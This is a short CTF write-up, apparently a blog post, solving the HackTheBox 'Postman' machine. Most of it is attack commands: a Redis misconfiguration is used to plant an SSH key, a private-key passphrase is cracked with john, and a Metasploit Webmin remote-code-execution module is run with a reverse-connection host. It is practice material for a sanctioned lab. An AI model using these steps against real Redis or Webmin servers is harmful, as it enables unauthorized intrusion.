Postman @ HackTheBox • Vulndev

14MarMarch 14, 2020

Postman @ HackTheBox

By xct CTF hackthebox, linux, metasploit, redis, webmin

Postman is a 20-point machine on hackthebox, that involves using redis to write an ssh key to disk, cracking the password of a private key and exploiting a webmin vulnerability with metasploit.

Notes

Redis:

ssh-keygen
echo -e '\n\n' >> blob.txt
cat redis.pub >> blob.txt
echo -e "\n\n" >> blob.txt

CONFIG SET dir "/var/lib/redis/.ssh"
CONFIG SET dbfilename "authorized_keys"
flushall
exit

cat blob.txt | redis-cli -h postman.htb -x set ssh
redis-cli -h postman.htb save

ssh -i redis redis@postman.htb

John:

ssh2john.py matt | tee matt.hash
john --wordlist=rockyou.txt matt.hash

Metasploit:

msf: search webmin, use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST <ip>

Author

xct

Related Posts

28AprApril 28, 2019

Unattended @ HackTheBox

Unattended is a high difficulty machine on hackthebox, featuring manual sql injection, log poisoning and some guessing. read more

23MarMarch 23, 2019

Frolic @ HackTheBox

Frolic is a medium difficulty machine on hackthebox.eu, featuring a lot of CTF-ish language conversions, the usage of a public... read more

11AprApril 11, 2020

Traverxec @ HackTheBox

Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase... read more

30JunJune 30, 2019

Haystack @ HackTheBox

Haystack is a 20 points machine on hackthebox, which in my opinion is not as easy as one might think.... read more

28DecDecember 28, 2019

InfernoCTF Weakened Keys

"Weakened Keys" was an interesting crypto challenge on InfernoCTF. read more

27AugAugust 27, 2022

Resource-Based Constrained Delegation – Resourced @ PG-Practice

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD... read more

24AprApril 24, 2021

DynamoDB & S3 Buckets – Bucket @ HackTheBox

We are going to solve Bucket, a medium Linux machine on HackTheBox. We get credentials from DynamoDB, upload a webshell... read more

03AugAugust 3, 2019

Safe @ HackTheBox

Safe is an "easy" machine on hackthebox, involving a simple buffer overflow and cracking a keepass file. read more

13MarMarch 13, 2021

Reel2 @ HackTheBox

Solving Reel2 on HackTheBox. This is a 40 point box involving Spraying, Phishing, Sticky Notes and JEA. read more

16JanJanuary 16, 2022

Lab – Rainbow Walkthrough

Rainbow is a medium difficulty machine that involves a SEH-based buffer overflow for user and a UAC bypass for root. read more